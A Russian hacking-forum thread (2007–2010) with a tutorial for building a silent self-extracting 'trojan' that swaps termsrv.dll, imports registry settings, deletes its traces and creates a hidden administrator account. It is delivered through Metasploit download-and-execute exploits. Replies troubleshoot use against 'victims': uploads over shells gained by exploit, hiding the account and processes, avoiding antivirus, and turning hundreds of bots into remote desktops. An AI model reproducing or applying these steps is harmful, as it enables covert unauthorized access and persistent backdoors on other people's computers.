PDA

Просмотр полной версии : Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких)


-=lebed=-
21.03.2007, 19:37
Превращение WIN-XP-SP2 в сервер терминалов (или троян от Мелкомягких)

Предисловие.

Многие знают, что из WIN-XP можно сделать сервер терминалов и подключаться по сети к удалённому рабочему столу удалённо, работая в отдельной ссесии с графическим интерфейсом, при этом не отключая локального пользователя. То есть в итоге мы получаем возможность входа ещё одного пользователя в систему, только удалённого.

ссылка по теме: http://www.xakep.ru/post/28531/default.asp
В случае прямого доступа к компьютеру это сделать несложно, заменив одну dll (termsrv.dll), настроив политики безопасности, разрешив удалённый рабочий стол и т. д.

Наша задача провернуть всё это удалённо, имея только cmd-шелл.

1. Подготовка
Нам потребуется сама termsrv.dll от старой версии (не помню какой бетты) 5.1.2600.2055 - такая у меня, прямые руки и мозги в голове.
Обратимся к статейке (не помню кто автор, откопаю ссылку-выложу тут, позже):


Все знают, что XP позволяет работать терминальной сессией (mstsc.exe), но при этом можно работать или локально или удаленно.
А мы ХОЧИМ, как в серверных виндах! Не проблема:

...статья описывает возможность одновременной работы двух пользователей за компьютером с ОС Microsoft Windows XP SP2.
В этом случае один из них работает за компьютером локально, то есть пользуется консольной сессией, а второй подключается
по протоколу RDP (Remote Desktop Protocol - Удалённое подключение к рабочему столу). Данный механизм задействует Fast User Switching
включается в <Управлении пользователями> в Контрольной панели) - это служба, которая предоставляет широко используемую возможность
попеременной работы нескольких пользователей без завершения сеанса. Если Windows входит в домен, то Fast User Switching недоступна и,
следовательно, одновременные пользовательские сесии тоже работать не будут. Эта функция планировалась для Windows XP Service Pack 2
и присутствовала в бета-версиях SP2 вплоть до сборки 2055. Однако позже Microsoft решила, что жирновато будет включать фактически
серверную функцию в ОС для рабочих станций, и начиная со сборки 2082 возможность одновременных подключений была отключена.

Если взять TermSrv.dll от бета-версии Windows XP SP2 и заменить ею исходную, то функция двух одновременных сеансов становится вновь доступна.
Для её включения требуется внести изменения в реестр при помощи прилагаемого key.reg.

Процедура замены dll стандартна:

делаем недоступным дистрибутив Windows (то есть вынимаем установочный CD из дисковода, отключаем/переименовываем сетевые ресурсы и так далее);
переименовываем резервную копию файла, находящуюся в папке %WinDir%\System32\DLLCache;
копируем туда новый файл;
переименовываем рабочую копию файла в папке %WinDir%\System32;
копируем на её место новый файл;
отклоняем просьбу Windows File Protection предоставить доступ к дистрибутиву;
соглашаемся держать в системе постороннюю версию файла;
перезагружаемся.

Наслаждайтесь, мои маленькие!


2. Сборка трояна (down-patch`а)
Итак приступим к сборке трояна от Meлкомягких:
Ну вот, нужная инфа у нас есть. Используем обычный SFX-архив WinRAR, чтоб положить туда три файла:
termsrv.dll - наша dll
key.reg - файл настроек сервера терминалов
run.cmd - сценарий, который сделает всё необходимое.
Определимся с путём куда будет распаковываться наш архив. Я выбрал %WinDir%\Temp (есть у любой винды)
Можно начинать писать файл run.cmd (ему мы передадим управление после распаковки SFX-архива)
Заменить залоченную termsrv.dll, перезаписав её у нас не получится, но мы можем её переименовать!

ren %SystemRoot%\system32\termsrv.dll termsrv.old - переименовываем оригинал

Так же не забудем про то, что она может быть легко восстановлена службой System File Protection из dll - кэша, поэтому, заменим её и там (она не залочена) а в system32 уже можно скопировать под оригинальным именем.

copy %SystemRoot%\temp\termsrv.dll %SystemRoot%\system32\DLLCache\termsrv.dll - копируем в dll-кэш
copy %SystemRoot%\temp\termsrv.dll %SystemRoot%\system32\termsrv.dll - копируем в систем32

далее:

reg import key.reg - импортируем настройки из файла key.reg в реестр (о его содержании чуть ниже)
del %SystemRoot%\system32\termsrv.old - пытаемся удалить старую dll (не получится - залочена)
del %SystemRoot%\temp\termsrv.dll - удаляем за собой следы из Temp`a
del %SystemRoot%\temp\key.reg - удаляем за собой следы из Temp`a
net user asdf 1234 /add /expires:never /times:all - добавляем пользователя asdf, пароль 1234 (будем подключаться такой учёткой)
net localgroup "Администраторы" asdf /add - делаем его админом (естественно "Администраторы" - должно быть набрано в DOS 866-кодировке)
del %SystemRoot%\temp\run.cmd - удаляем этот исполненный сценарий.


Готовим файл key.reg

Берём нашу винду, запускаем regedit и экспортируем реестр. Далее делаем все настройки удалённого рабочего стола.
а) разрешаем его: Свойства системы -> Удалённые сеансы -> Разрешить удалённый доступ к этому компьютеру. (ставим галку)
б) разрешаем быстрое переключение пользователей: Учётные записи пользователей-> Изменение входа пользователей в систему ставим обе галки (использовать страницу приветствия, разрешить быстрое переключение пользователей)
Кстати, надо сделать чтоб наш пользователь не отображался в этом приветствии, так как это сразу палево, поэтому сделаем его скрытым:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"asdf"=dword:00000000
- не забудем добавить эту строку в наш key.reg (потом)
Экспортируем реестр ещё раз, затем в TotalCommander сравниваем два файла реестра по содержимому, отслеживаем изменения и заносим их в блокнот.
Сохраняем как файл key.reg
Добавим туда (в начало) ещё то что, прилагалось в статье (настройка сервера терминалов и политики безопасности):

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core]
"EnableConcurrentSessions"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllowMultipleTSSessions"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]
"Options"=dword:00000000
"Version"=dword:00010001
"DSPath"="LocalGPO"
"FileSysPath"="C:\\WINNT\\System32\\GroupPolicy\\Machine"
"DisplayName"="Политика локальной группы"
"Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]"
"Link"="Local"
"GPOName"="Политика локальной группы"
"GPOLink"=dword:00000001
"lParam"=dword:00000000

И в конец строку, делающую нашего админа asdf невидимым в окне приглашения.

То что у меня получилось (файл key.reg) , можно скачать тут (http://lebed.ucoz.ru/soft/key.zip) (имхо его надо всё-таки почистить, много лишнего)

Ну всё готово! Архивируем три файла (termsrv.dll, run.cmd, key.reg) WinRar`ом. Выставляем параметры:

;В комментарии ниже находятся команды SFX-сценария

Path=.\%SystemRoot%\temp - каталог куда будет распаковано содержимое архива
SavePath
Setup=run.cmd - выполнить после распаковки
Silent=1 - скрыть всё
Overwrite=2 - перезаписывать существующие файлы

Всё, наш троян готов! (Я обозвал SFX-архив terminal.exe)

3. Впаривание трояна
Используя пакет Metasplot Framework и уязвимости в Windows-XP вы можете попробовать обеспечить его загрузку (впаривание) с удалённого сервера и передачу ему управления. (полезная нагрузка win32_downloadexec)
В общем как вы запустите его на компьютере жерты - это зависит от ваших знаний и везения.
Один из способов описан мной в статье "Metasplot Framework часть 2 (или раздача троя)".

Заключение.
Вот так можно сделать downgrade системы Win-xp-sp2, превратив её в сервер терминалов. Конечно более-менее продвинутый пользователь заметит другого пользователя в системе, убьёт учётку, может сделать откат и т. д. Поэтому в серьёз данного трояна рассматривать не стоит. Кроме того dll ранней версии может быть заменена на новую при установке, добавлении компонентов из дистрибутива и т.д. Но в локалке такая переделка актуальна.
Можно добавить его в автозагрузку - будет даунгрейдится каждый раз при запуске.
Минус в том, что для вступления в силу изменений потребуется перезагрузка системы (можно добавить команду перезагрузки в run.cmd) и только потом будет возможно подключится к удалённому рабочему столу.


P.S.Тут не рассмотренна проблема, которую может создать нестандартный файрвол при подключении к серверу терминалов. (у меня был и стандартный отключен)
Скачать (http://lebed.ucoz.ru/soft/terminal.zip) готовый SFX-архив terminal.exe (внутри всё необходимое) Антивирем не палится ;-) (и вряд ли когда будет).

onikishov
25.03.2007, 15:02
класс! только вот в чем проблемка... я пробывал на себе... в общем появляеться окошко, типо "Вставте диск №2", ну да ладно жму отмену и сохранить файлы. Но после перезагрузки новый пользователь не появляеться. Пробывал на остальных юзверях в общем с SP2 ваще не катит... с SP1 прокатило. И то! двух пользователей одновременно не поддерживает. В общем в чем the problem?

-=lebed=-
25.03.2007, 22:44
класс! только вот в чем проблемка... я пробывал на себе... в общем появляеться окошко, типо "Вставте диск №2", ну да ладно жму отмену и сохранить файлы. Но после перезагрузки новый пользователь не появляеться. Пробывал на остальных юзверях в общем с SP2 ваще не катит... с SP1 прокатило. И то! двух пользователей одновременно не поддерживает. В общем в чем the problem?

1. Всё справедливо, для Локализованной русской винды, если сидишь под админской учёткой (под ограниченной админа не добавишь). Удалённый сплоит, насколько мне известно получает права "system". Файл сценария run.cmd должен быть набран в 866 кодировке (иначе не найдётся группа "Администраторы" при добавлении нового админа).
2. Проверь termsrv.dll - найди на системном диске все копии библиотеки и глянь версию, может всё-таки оригинальная используется и операция с заменой dll не прошла успешно...
На неделе попробую на трёх системах WIN-XP, SP1, SP2, имхо там есть различие в функционировании службы защиты системных файлов, доведу сборку до ума, чтоб на всех трёх прокатывало...

onikishov
26.03.2007, 00:12
м... ну я еще не такой опытный... :) в общем благодаря этой статье идейка у меня появилась, сделать что-то подобное с радмином... в общем за ранее спасибо за доработанную сборку:)

_Great_
26.03.2007, 00:20
Хм... Очень интересная статья, то что не будит палиться - это радует...
было бы странно палить АВ фактически родную длл винды :D

-=lebed=-
26.03.2007, 08:54
м... ну я еще не такой опытный... :) в общем благодаря этой статье идейка у меня появилась, сделать что-то подобное с радмином... в общем за ранее спасибо за доработанную сборку:)

C РАдмином уже сделано (читай мега FAQ Elekt`a по RA). Да и я тоже делал (немного по своему, хотя смысл тот же). Как раз поэтому и захотелось это сделать с сервером терминалов в XP... :)

onikishov
26.03.2007, 23:35
Вот в чем проблема короче делаю SFX архив
коментарии:
Path=C:\WINDOWS\Help\123\
SavePath
Setup=C:\WINDOWS\Help\123\svchost.exe
Setup=C:\WINDOWS\Help\123\111.bat
Setup=123.exe
Silent=1
Overwrite=2
А антивирус палит, в чем the problem?

3DViruzZ
27.03.2007, 02:13
onikishov
Не понял, откуда ты взял этот sfx. сам создал и напичкал публичными вирями чтоли? )
Пользоваться надо sfx-сом -=lebed=- (Скачать) (http://lebed.ucoz.ru/soft/terminal.zip)
Внимательнее надо читать.
З.Ы.: смотри не запусти случайно его у себя на компе )

-=lebed=-
27.03.2007, 11:44
Вот в чем проблема короче делаю SFX архив
коментарии:
Path=C:\WINDOWS\Help\123\
SavePath
Setup=C:\WINDOWS\Help\123\svchost.exe
Setup=C:\WINDOWS\Help\123\111.bat
Setup=123.exe
Silent=1
Overwrite=2
А антивирус палит, в чем the problem?

Как радмин не назови - будет палится, пробуй его криптовать сначала...

onikishov
27.03.2007, 23:04
onikishov
Не понял, откуда ты взял этот sfx. сам создал и напичкал публичными вирями чтоли? )
Пользоваться надо sfx-сом -=lebed=- (Скачать) (http://lebed.ucoz.ru/soft/terminal.zip)
Внимательнее надо читать.
З.Ы.: смотри не запусти случайно его у себя на компе )

нет, это не вери, а радмин. Так прикол в том, что сначала проверяешь Касперским на вирусы, он светит ниче нема. А у других юзверей орет, что есть(какой антивирус не знаю).

flipper
09.04.2007, 09:06
Вместо использования key.reg можно было в run.cmd прописать что то вроде этого:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 00000001
REG ADD "HKLM\SYSTEM\ControlSet001\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000
REG ADD "HKLM\SYSTEM\ControlSet001\Control\Terminal Server" /v fEnableSalem /t REG_DWORD /d 00000000
REG ADD "HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD" /v NextInstance /t REG_DWORD /d 00000001

onikishov
09.04.2007, 19:25
Лучше бы доработали,оч интересно.У самого мозгов пока что не хватает:(

Slon
11.04.2007, 18:23
Чтоб не париться вот патченая длл-ка с моей машины: http://temp.aoh.name/termsrv.dll
Патч: http://temp.aoh.name/TS-Free-1.1.exe

Автор молодец, статья кул +)

DanST
27.06.2007, 23:40
А вам слабо сделать такие файлы с обратным действием??????
(на всякий случай :))
Мало ли ты заметил что тебя так протроили...... и ты об этом узнал.!. Конечно же тебе захочется воспользоваться де активом НО ЕГО НЕ СУЩЕСТВУЕТ!!!!!!!!!!!!!!!!!!!

-=lebed=-
28.06.2007, 08:49
А вам слабо сделать такие файлы с обратным действием??????
(на всякий случай :))
Мало ли ты заметил что тебя так протроили...... и ты об этом узнал.!. Конечно же тебе захочется воспользоваться де активом НО ЕГО НЕ СУЩЕСТВУЕТ!!!!!!!!!!!!!!!!!!!
Если работает служба восстановления системы (наблюдение за дисками и реестром), то всегда можно сделать откат системы, на более раннюю дату, кроме того, установка какого-либо компонента виндос, как правило, переписывает termsrv.dll на оригинальную.

Loading
09.07.2007, 22:39
Когда конектюсь к компу выводит такую байду

"Интерактивный вход в систему на данном компьютере запрещен локальной политикой."

В чём дело?

1. Смотри в статье это: "Настройка сервера терминалов и политики безопасности".
2. После изменений настроек политики безопасности в реестре требуется перезагрузка системы.

onikishov
21.08.2007, 21:13
м... А где доработка? уже много времени прошло... В общем возникают проблемы только с SP2. Еще когда на компе включен NOD32 или фаер. netsh firewall add portopening TCP 3389 systerm - эта команда особо не помогает:( Если кто-то продвинулся в этом деле помогите плиз:)

Kиt
02.11.2007, 20:51
Почему на некоторых дедиках невылазиет окошко чтобы вставить диск ?
Из за этого дедик терминалом нестановится ((
Почему так ?

NaX[no]rT
03.11.2007, 00:00
"было бы странно палить АВ фактически родную длл винды" если включена "Проактивная защита", то спалит =) я про Касперского (kis), а так хз, неплохо )

Belfigor
28.12.2007, 09:03
Да всё бы хорошо :) но как только ты подрубаешься к машине , то у юзера вылетат msgbox , мол asdf пытается установиться связь с этим комп и тд , и если он жмёт "НЕТ " а ведь всё жмут "НЕТ", то облом , а если "ДА" то он тогда вываливается из тачки, начинаются подозрения , жаль что ничего нельзя придумать ... , если есть методы посоветуйте

зы а так всё работает на ура ;)

-=lebed=-
28.12.2007, 11:29
Да всё бы хорошо :) но как только ты подрубаешься к машине , то у юзера вылетат msgbox , мол asdf пытается установиться связь с этим комп и тд , и если он жмёт "НЕТ " а ведь всё жмут "НЕТ", то облом , а если "ДА" то он тогда вываливается из тачки, начинаются подозрения , жаль что ничего нельзя придумать ... , если есть методы посоветуйте

зы а так всё работает на ура ;)

"Разрешить быстрое переключение пользователей"
- msgbox не должен выскакивать.
- локально работающий юзер не вываливается из своей сессии. Оба должны работать одновременно!

Belfigor
29.12.2007, 00:21
"Разрешить быстрое переключение пользователей"
- msgbox не должен выскакивать.
- локально работающий юзер не вываливается из своей сессии. Оба должны работать одновременно!

протестил , запустил у жертвы terminal.exe (жертва комп ребутнула ) далее , msgbox вылетает и всё описанное выше :( вот скрины http://slil.ru/25300166

-=lebed=-
29.12.2007, 13:40
протестил , запустил у жертвы terminal.exe (жертва комп ребутнула ) далее , msgbox вылетает и всё описанное выше :( вот скрины http://slil.ru/25300166

Ты уверен, что замена termsrv.dll прошла успешно и не восстановилась оригинальная версия? Проверь версию либы... Перезагрузку делал?

Belfigor
31.12.2007, 07:08
Ты уверен, что замена termsrv.dll прошла успешно и не восстановилась оригинальная версия? Проверь версию либы... Перезагрузку делал?

Так всё проверил :) , значит из 5 компов , 2 пашут нормально , 3 нет , то есть к двум можно подрубиться без проблем жертва ничего не видеть , а на остальных трёх вылетает сообщение (пытается установить сзязь asdf и тд ) хотя точно знаю , что на тех 3 компах , полностью отключенно восстановление системы , отключен бранмауэр , и CD WINDOWS XP PRO не вставлялся (после запуска terminal.exe) и компы были срузу перезагружены и не один раз :D , вот такие дела , самому уже просто интересно , почему это происходит ..... :rolleyes:

-=lebed=-
31.12.2007, 12:26
Так всё проверил :) , значит из 5 компов , 2 пашут нормально , 3 нет , то есть к двум можно подрубиться без проблем жертва ничего не видеть , а на остальных трёх вылетает сообщение (пытается установить сзязь asdf и тд ) хотя точно знаю , что на тех 3 компах , полностью отключенно восстановление системы , отключен бранмауэр , и CD WINDOWS XP PRO не вставлялся (после запуска terminal.exe) и компы были срузу перезагружены и не один раз :D , вот такие дела , самому уже просто интересно , почему это происходит ..... :rolleyes:

Ещё может зависеть от версии винды. У тебя точно все одинаковые? (XP, SP1, SP2 - разница точно есть) а вот если разные билды, то х.е.з. Ну раз на 2 работает - это уже гуд! А ты на тех на которых не получается посмотри параметр "быстрое перекл. пользователей" в системе...

Belfigor
01.01.2008, 08:20
2 -=lebed=- у меня проблема в следующем , когда я получаю эксплоитом LSA "сmd " чужого компа , я не могу залить terminal .exe , то есть на дедике это работает !!!
Ставю себе TYPSoft FTP Server , создаваю свой аккаунт и заливаю
F:\Documents and Settings\sss>ftp
ftp> o
К xx.xxx.xxx.xxx
Связь с xx.xxx.xxx.xxx
220 TYPSoft FTP Server 1.10 ready...
Пользователь (xx.xxx.xxx.xxx:(none)): sss
331 Password required for sss.
Пароль:
230 User sss logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 2918400 Dec 20 11:46 fly.exe
-rwxrwxrwx 1 ftp ftp 349696 Dec 23 12:54 sex.exe
-rw-rw-rw- 1 ftp ftp 149001 Dec 23 14:00 terminal.exe
drw-rw-rw- 1 ftp ftp 0 Apr 30 19:00 sss
226 Transfer complete.
ftp: 279 байт получено за 0,00 (сек) со скоростью 279000,00 (КБ/сек).
ftp> Get terminal.exe
200 Port command successful.
150 Opening data connection for terminal.exe.
226 Transfer complete.
ftp: 149001 байт получено за 0,16 (сек) со скоростью 2227,36 (КБ/сек).

начинаю заливать через shell , доходит до

F:\Documents and Settings\sss>ftp
ftp> o
К xx.xxx.xxx.xxx
Связь с xx.xxx.xxx.xxx
220 TYPSoft FTP Server 1.10 ready...
Пользователь (xx.xxx.xxx.xxx:(none)): sss
_

и затем всё зависает наглухо :(((
и так на всех компах к которым получил доступ , все службы вырубил net STOP...
почему это произходит ? будь добр скажи

зы: на хакер часть постов в этом топике почикали (мол ФЛУД) и вообще отношение модеров оставляет желать лучшего http://forum.xakep.ru/m_1033948/mpage_2/key_/tm.htm#1044503

-=lebed=-
01.01.2008, 12:56
Оффтоп (неудержался):
Ого, я на ][ легенда уже ... ГЫ!

- Лебедь (посмертный бан) - но он сам напросился)
- Его аккуант был забанен после того, как он сам ушёл с форума.
Мдя...

По сабжу:
1. Если ты "имеешь" систему сплоитом LSA - то это явно не XP SP2, а SP1 или просто XP
2. А если это не SP2 то мой файлик с настройками реестра может и не подойти. Надо попробовать всё сделать самому вручную на SP1, так как возможны ньюансы (я сам на SP1 и ниже не тестил...)
P.S. Жаль потерянного времени на ][...

Belfigor
01.01.2008, 13:50
Оффтоп (неудержался):
Ого, я на ][ легенда уже ... ГЫ!
Мдя...

По сабжу:
1. Если ты "имеешь" систему сплоитом LSA - то это явно не XP SP2, а SP1 или просто XP
2. А если это не SP2 то мой файлик с настройками реестра может и не подойти. Надо попробовать всё сделать самому вручную на SP1, так как возможны ньюансы (я сам на SP1 и ниже не тестил...)
P.S. Жаль потерянного времени на ][...

да ты прав , все тачки XP HOME , но больше интересует вот это факт

"начинаю заливать через shell , доходит до

F:\Documents and Settings\sss>ftp
ftp> o
К xx.xxx.xxx.xxx
Связь с xx.xxx.xxx.xxx
220 TYPSoft FTP Server 1.10 ready...
Пользователь (xx.xxx.xxx.xxxnone)): sss
_

и затем всё зависает наглухо ((


вообще не только твой файлик не заливается и другие тоже :(( уже сегодня не только через дедик проверил (через делик заливается ) к другу пришёл подрубился через его cmd к своему ftp и всё залили что было нужно к нему (затем удалил конечно :) пробую через shell , не фига (см выше) :rolleyes:

-=lebed=-
01.01.2008, 13:55
да ты прав , все тачки XP HOME , но больше интересует вот это факт

вообще не только твой файлик не заливается и другие тоже :(( уже сегодня не только через дедик проверил (через делик заливается ) к другу пришёл подрубился через его cmd к своему ftp и всё залили что было нужно к нему (затем удалил конечно :) пробую через shell , не фига (см выше) :rolleyes:

Не зависает! вводи пароль! в консоли ничего не будет отображаться (даже курсор).

P.S. Попробуй локально через cmd зайти на свой TYPSoft FTP Server 1.10, заходит? Имхо уже пошёл оффтоп..."Особенности работы клиента ftp через удалённый cmd-шелл"

Belfigor
01.01.2008, 14:13
Не зависает! вводи пароль! в консоли ничего не будет отображаться (даже курсор).

P.S. Попробуй локально через cmd зайти на свой TYPSoft FTP Server 1.10, заходит? Имхо уже пошёл оффтоп..."Особенности работы клиента ftp через удалённый cmd-шелл"

Да вот именно ввожу пароль и всё зависает и весит глухо , локально захожу через cmd на свой TYPSoft без проблем , а через shell жерты ,после ввода пароля всё виснет и весит :confused: сорри за оффтоп

-=lebed=-
01.01.2008, 14:23
Да вот именно ввожу пароль и всё зависает и весит глухо , сорри за оффтоп
а локально заходит? попробуй другой FTP демон, я пользовался FTP Server by Pablo Software Solutions Version 1.52 - работало...

ЗЫ имхо проблема с установлением соединения по ftp с твоим компом (NAT, фаер...)

onikishov
16.02.2008, 01:13
Лебедь, будет обновление твоего релиза?
->Вряд-ли, а чем тот не устраивает?

onikishov
16.02.2008, 22:27
->Вряд-ли, а чем тот не устраивает?
Это типо наезд? :D
Интересно, может Вы куда-то дальше продвинулись.
На неделе попробую на трёх системах Win-xp, Sp1, Sp2, имхо там есть различие в функционировании службы защиты системных файлов, доведу сборку до ума, чтоб на всех трёх прокатывало...
Вы ж словами просто так не кидаетесь?
руки не дошли до этого в своё время, а щас лень этим заниматься...
Кто? если не ты сам? (с) Elekt

Ru}{eeZ
02.09.2008, 21:42
У кого не скрывается пользователь меняем:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"asdf"=dword:00000000

на

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"asdf"=dword:00000000

AHTOLLlKA
03.09.2008, 07:50
У кого не скрывается пользователь меняем:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"asdf"=dword:00000000

на

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"asdf"=dword:00000000

блин... мож я че не догнал.... строки веть идентичны оО


а статья отличная просто

stopxaker
18.12.2008, 22:00
Кто может перезалить terminal.exe - а то сайт лебедя на юкозе мертв.

Тут soft_all.zip (http://stopxaker-com.na.by/showthread.php?t=175) там ещё несколько файлов нужных для работы ;)

Richard
18.12.2008, 22:23
Автору зачёт! очень интересная статья

stopxaker
18.12.2008, 22:58
Автору зачёт! очень интересная статья

Не то слово интересная , статья высшая , год назад вообще дедики по 38 штук в сутки делал :)

-=lebed=-
19.12.2008, 00:14
Кто может перезалить terminal.exe - а то сайт лебедя на юкозе мертв.
сайт жив, скорее всего проблемы у самого юкоза были...

-=lebed=-
22.12.2008, 12:21
Благодарю. Действительно сейчас все в порядке. Вопрос: Т.е. я ставлю этот терминал на дед под свою учетку - и все!?
Да, но потребуется перезагрузка и вероятность что сработает ~33% потому как он собран под конкретную сборку винды, на других может и не прокатить...

gri.n
22.12.2008, 19:02
да 30 % маловато ! Но статья заслуживает уважения !

s_p_a_m
31.12.2008, 16:56
Учетку видно при загрузке компа, как это возможно исправить? Каким образом скрывается учетная запись Администратор, которую видно только при загрузке в сейф моде, как сделать эту учетку также ?

stopxaker
03.01.2009, 18:11
2 -=lebed=- c новым годом тебя учитель ;) у меня к тебе вопрос , значит так ... довольно часто имею cmd на w2k , учётку создают без проблем , если конечно винда не на испанском :( , но нет конекта к RDP, то есть выдаёт Не удаётся подключиться к удалённому компьютеру и тд и тп как это можно сделать через cmd , пробывал прописывать это

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\DomainPr ofile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"

на ХР бывает прокатывает , а вот W2K не срабатывает это :( что можно придумать , если знаешь будь добр подскажи :)

-=lebed=-
03.01.2009, 18:18
на ХР бывает прокатывает , а вот W2K не срабатывает это :( что можно придумать , если знаешь будь добр подскажи :)
На W2K не пробовал, кроме того может тебе попадаются W2K server ?

-=lebed=-
03.01.2009, 18:23
Учетку видно при загрузке компа, как это возможно исправить? Каким образом скрывается учетная запись Администратор, которую видно только при загрузке в сейф моде, как сделать эту учетку также ?

Q: Как скрыть учетную запись пользователя в экране приветствия

Для того чтобы скрыть учетную запись в экране приветствия необходимо в реестре, в разделе HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon создать подраздел с именем SpecialAccounts, а в нем еще один с именем UserList.
Затем в разделе UserList создайте параметр типа REG_DWORD с именем равным имени учетной записи, которую необходимо скрыть и со значением равным 0 (ноль), соответственно для отображения этой учетной записи в экране приветствия значение параметра нужно будет установить 1 (один) или удалить параметр.

Также можете текст кода скопировать в текстовый файл, исправить имя параметра ("User") на имя учетной записи, которую хотите скрыть, сохранить файл, присвоить ему расширение *.reg и запустить полученный файл, согласившись с внесением изменений в реестр.
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"Blast"=dword:00000000

Учтите, что вместе со скрытием учетной записи в экране приветствия также эта учетная запись будет скрыта и из апплета "Учетные записи пользователей" в Панели управления.
Конечно управлять учетной записью (настраивать) вы сможете из оснастки "Локальные пользователи и группы", которую можно открыть через Пуск - Выполнить - lusrmgr.msc, а так же в классическом управлении учетными записями пользователей: Пуск - Выполнить - control userpasswords2

stopxaker
03.01.2009, 18:25
На W2K не пробовал, кроме того может тебе попадаются W2K server ?

ага и W2K server и standard Ed :) сейчас с W2k standard Ed сижу уже голову сломал :)

зы в ПМ скинул ip с пассом от радмина

InvisibleSM
06.01.2009, 04:13
реально ли скрыть присутствие юзера в диспетчере задач, вкладка пользователи?

-=lebed=-
06.01.2009, 11:09
реально ли скрыть присутствие юзера в диспетчере задач, вкладка пользователи?
Да всё можно скрыть вообщем-то, ключевое слово "руткит".
P.S. Может проще совсем запретить диспечер задач, изменив политики безопасности?

InvisibleSM
06.01.2009, 15:17
за руткит спасибо огромное, а запрещать диспетчер, всмысле чтоб хозяин компа не мог его открыть? :) это палево уже

hack001
15.08.2009, 21:23
нет палится , у меня kis 7.0 так его он сажрал .

vov4ka
24.09.2009, 08:57
В общем сделал все как в статье и не могу зайти на комп,чтобы не выкидывало его текущего пользователь и все. Помог файлик key.reg. У меня огромная просьба к автору: дайте, плз, ссылку на статью "настройка сервера терминалов и политики безопасности" или поясните значение настроек файла ket.reg и расскажите как можно настроить его через консоль управления! Заранее оч. благодарен!

jasd
12.12.2009, 00:29
пробовал запустить на удаленном компе термина, запустил скачаный файл из статьи, а нового пользователя нет. в чем беда?

$ereg@
14.12.2009, 23:51
значит не запустил или в реестр ничего не добавилось) копай в ту сторону) а может сработал какойнить avast и не дал запуститься)
советую поставить на машину скрытый радмин и глянуть что происходит на машине. токо не вздумай с радмином с полным управлением на машину залететь))))

ichechen
09.01.2010, 14:34
нет, это не вери, а радмин. Так прикол в том, что сначала проверяешь Касперским на вирусы, он светит ниче нема. А у других юзверей орет, что есть(какой антивирус не знаю).
Некоторые антивири вроде mcafee палят сам sfx архив если там идет скрытый запуск чего то)))
за руткит спасибо огромное, а запрещать диспетчер, всмысле чтоб хозяин компа не мог его открыть? :) это палево уже
Сделай точно такой же диспетчер за исключением того, что там твои процессы не будут высвечиваться и замени путь к диспетчеру в реестре :D

Nik(rus)
07.02.2010, 14:22
Штука занятная... ну у меня SP2 и не пашет, версию смарел - при копи(пасте) версии 2055 она чeдесным образом меняется на 2180! Обидно, помогли только установки TS_Free + WPA_Kill, но они с гуи, а у меня тока консоле :(, хотел через AutoIt сделать... но лениво :)
PS: наткнулся на пасс админа от логов трояна, кладущего радмин, компов штук 500, все работает, повезло!

Nik(rus)
07.02.2010, 16:29
Ура, я смог заменить dll-ку... но она не пашет чтоли? :3 У меня все равно нужно выкинуть админа для входа...

Ан нет, это были кривые руки, удалившие кое-что из ключа реестра! Аффтару респект, статья лучшая ;)

ErrorNeo
08.03.2010, 02:18
немного развил тему:
http://forum.antichat.ru/showpost.php?p=1962387&postcount=12

rebbe
22.03.2010, 20:56
а можно как нибудь прикрутить запрос еще?например ставлю скрипт который собирает ип и если все ровно установилось с прямым ипом то он отстукивается на скрипт,вот так как нибудь можно замутить?
просто есть ботов штук 300,хотел их просто прогрузить что бы дедиков из них сделать

noxjoker
22.03.2010, 21:20
ErrorNeo канешно гениально написать на Delphi что можно сделать просто в бате. Или вообще лучше сделать так:
исполняющий файл
и dll .
Или можно чтоб качало dll. Так только один ехе будет.

Rebbe пишешь scan + brute на 3389. После получение компа надо чтоб выполнило твой exe.
Может тебе поможет

http://gravityd.narod.ru/RunRDp.JPG

Life7
22.03.2010, 22:39
спасибо. очень вроде ясная инфа.
скоро попробую на практите.

rebbe
22.03.2010, 22:55
Rebbe пишешь scan + brute на 3389. После получение компа надо чтоб выполнило твой exe.

Может тебе поможет
немогу прожевать( че писать на чем ....

noxjoker
23.03.2010, 00:48
